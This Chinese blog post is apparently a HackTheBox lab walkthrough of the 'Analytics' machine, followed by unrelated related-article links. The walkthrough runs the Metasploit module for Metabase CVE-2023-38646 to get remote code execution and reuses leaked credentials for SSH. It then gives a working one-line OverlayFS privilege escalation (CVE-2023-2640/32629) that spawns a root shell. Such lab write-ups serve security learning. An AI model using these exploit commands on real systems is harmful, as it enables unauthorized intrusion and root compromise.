HackTheBox-Machines--Analytics

于 2023-12-18 10:09:35 发布
阅读量194 收藏
点赞数
分类专栏: 靶场集合 # HACK THE BOX 文章标签: Hack The Box Metabase RCE CVE-2023-38646 CVE-2023-2640 CVE-2023-32629
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sycamorelg/article/details/135009042
版权
本文详细描述了在进行网络测试时,从端口扫描开始,通过目录扫描、漏洞探测(如Metabase的CVE-2023-38646),获取权限并利用内核漏洞(如CVE-2023-2640和CVE-2023-32629)提升权限的过程。
摘要由CSDN通过智能技术生成

文章目录

Analytics 测试过程

1 端口扫描

nmap -sC -sV 10.129.205.142

在这里插入图片描述

2 测试思路

目标服务器只开启了80端口,所以出发点从80端口开始。对于web页面,能做的大致思路有:

  1.目录扫描
  2.网站信息泄漏
  3.探测web站点漏洞
  4.网站指纹

3 漏洞探测

  1.访问web站点

echo "10.129.205.142 analytical.htb" | sudo  tee -a /etc/hosts

  访问web站点:http://analytical.htb/,发现存在login登录页面。

在这里插入图片描述

echo "10.129.205.142 data.analytical.htb" | sudo  tee -a /etc/hosts

  点击 Login 访问登录页面 http://data.analytical.htb,发现使用Metabase开源商业智能工具,探测是否有Metabase相关漏洞。

在这里插入图片描述

  2.搜索Metabase相关漏洞

search metabase

  发现Metabase存在CVE-2023-38646,可以进行CVE-2023-38646漏洞利用

在这里插入图片描述

  3.CVE-2023-38646漏洞利用

use exploit/linux/http/metabase_setup_token_rce
show options

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

# 使用env命令查看环境变量,发现存在用户名密码
META_USER=metalytics
META_PASS=An4lytics_ds20223#

  接下来尝试使用ssh进行登录,如果可以连接,就能获取到metalytics的用户权限。

4 权限获取

  ssh登录,成功获取到metalytics用户权限,查看用户flag。

ssh metalytics@10.129.205.142

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

5 权限提升

# 显示出自己(执行 sudo 的使用者)的权限
sudo -l

在这里插入图片描述

# 显示系统所有相关信息
uname -a

在这里插入图片描述

  通过查看系统相关信息,发现内核版本,查看该版本是否存在内核提权漏洞。Ubuntu内核的OverlayFS模块中,存在CVE-2023-2640 和 CVE-2023-32629漏洞,可以通过该漏洞将权限提升至root权限。

  漏洞利用代码如下:

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'

在这里插入图片描述

ls -la /root
cat /root/root.txt

在这里插入图片描述

Comparison of Big Data OLAP DB : ClickHouse, Druid, and Pinot
AI天才研究院
11-17 8948
In this post I want to compareClickHouse,Druid, andPinot, the three open source data stores...
[it-ebooks]电子书列表
wadexmy的专栏
12-30 6264
#### it-ebooks电子书质量不错,但搜索功能不是很好 #### 格式说明  [ ]中为年份      ||  前后是标题和副标题  #### [2014]: Learning Objective-C by Developing iPhone Games || Leverage Xcode and Objective-C to develop iPhone gam
[it-ebooks]电子书列表v0.1.1
mapoor的专栏
02-06 1万+
#### 感谢it-ebooks团队 #### it-ebooks电子书质量很好,但搜索功能不太完善 #### 格式说明: [年份] 书名 || 副标题 || 页码 || 链接 #### [2015]: Data Mining Algorithms || Explained Using R || 720 || http://it-ebooks.info/book/4
(转) [it-ebooks]电子书列表
weixin_34233618的博客
01-15 1855
[it-ebooks]电子书列表 [2014]: Learning Objective-C by Developing iPhone Games || Leverage Xcode and Objective-C to develop iPhone games http://it-ebooks.info/book/3544/Learning Web App Devel...
Vmware Links(转自VMware-land)
weixin_30950607的博客
12-01 5656
这一阵子在专研虚拟机的VSS备份,无意中发现了VMware-land很好的网站,不知道为什么无法访问,难道也被和谐掉了???以下内容是从Google的页面缓存弄出来的,在Google搜索http://vmware-land.com/Vmware_Links.html第一个就是包含了你所知道的和不知道的,关于VMware ESX的方方面面链接地址 Backups: Vir...
The Definitive Security Data Science and Machine Learning Guide
omnispace的博客
06-21 2009
This is the Definitive Security Data Science and Machine Learning Guide. It includes books, tutorials, presentations, blog posts, and research papers about solving security problems using data science
人工智能/数据科学比赛汇总 2019.8
热门推荐
龙哥盟
08-09 4万+
内容来自 DataSciComp,人工智能/数据科学比赛整理平台。 Github:iphysresearch/DataSciComp 本项目由 ApacheCN 强力支持。 微博 | 知乎 | CSDN | 简书 | OSChina | 博客园 全球数据智能大赛(2019)——“数字人体”赛场一:肺部CT多病种智能诊断 https://tianchi.aliyun.co...
Unreal Engine 4.14 Release Notes
痞子龙3D编程
11-16 1万+
https://docs.unrealengine.com/latest/INT/Support/Builds/ReleaseNotes/2016/4_14/index.html Unreal Engine 4.14 Release Notes What's New Unreal Engine 4.14 introduces a new forward s
CNCF Landscape Summary
dechen6073的博客
05-26 2416
awesome-cloud-native awesome-cloudnative-cn landscape On Github cncf landscape CNCF Cloud Native Interactive Landscape 1. App Definition and Development 1.1 Data...
Prediction-Machines-The-Simple-Economics-of-Artificial-Intelligence
12-25
Prediction-Machines-The-Simple-Economics-of-Artificial-Intelligence
9-from-the-perceptron-to-support-vector-machines.zip
09-22
标题 "9-from-the-perceptron-to-support-vector-machines" 暗示了这是一个关于机器学习领域,特别是从感知机到支持向量机的发展历程的资料。这个主题涵盖了两种经典的监督学习算法,它们在模式识别、分类和回归问题...
cockpit-machines-ovirt-193-1.el7.noarch.rpm
12-18
官方离线安装包,亲测可用。使用rpm -ivh [rpm完整包名] 进行安装
cockpit-machines-ovirt-176-1.el7.noarch.rpm
12-18
官方离线安装包,亲测可用。使用rpm -ivh [rpm完整包名] 进行安装
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3245
每台都做一做,然后记录在博客里.供自己和大家一起学习.
绿色柔性导电水凝胶的构建及其在运动健康监测中的应用
11-11
绿色柔性导电水凝胶的构建及其在运动健康监测中的应用
com.harmonyos4.exception.GpsUnavailableException解决方案(亲测可用).md
11-11
鸿蒙开发中碰到的报错,问题已解决,写个文档记录一下这个问题及解决方案
21124412马俊东 LSTM模型 (1).ipynb
11-11
21124412马俊东 LSTM模型 (1).ipynb
python+基于LDA的情感分析项目+自然语言处理
最新发布
11-11
python+基于LDA的情感分析项目+自然语言处理
AGV调度模型设计《AGV小车负责完成集装箱从各自起点岸桥送到指定终点场桥》+项目源码+文档说明
11-11
<项目介绍> - 模型最终需求 所有任务完成的总时间;每个小车从开始任务到它最后一个任务的时间;每个小车完成多少个任务;每个小车充电的时间;每个小车等待充电的 时间;每个小车行走的距离 任务: 码头的工作区域内,AGV小车负责完成集装箱从各自起点岸桥送到指定终点场桥。 对应关系: 一个集装箱任务对应一个起点岸桥和一个终点场桥。 - 不懂运行,下载完可以私聊问,可远程教学 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用! 2、本项目适合计算机相关专业(如计科、人工智能、通信工程、自动化、电子信息等)的在校学生、老师或者企业员工下载学习,也适合小白学习进阶,当然也可作为毕设项目、课程设计、作业、项目初期立项演示等。 3、如果基础还行,也可在此代码基础上进行修改,以实现其他功能,也可用于毕设、课设、作业等。 下载后请首先打开README.md文件(如有),仅供学习参考, 切勿用于商业用途。 --------
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李沉肩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值